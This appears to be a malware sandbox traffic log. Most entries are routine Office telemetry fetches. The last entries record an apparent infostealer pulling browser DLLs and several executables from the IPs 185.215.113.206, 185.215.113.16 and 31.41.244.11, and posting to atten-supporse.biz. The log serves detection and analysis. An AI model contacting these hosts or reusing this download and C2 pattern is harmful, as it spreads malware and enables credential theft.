Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/7299809293/qk4EiZw.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ogs.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: atten-supporse.biz

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz

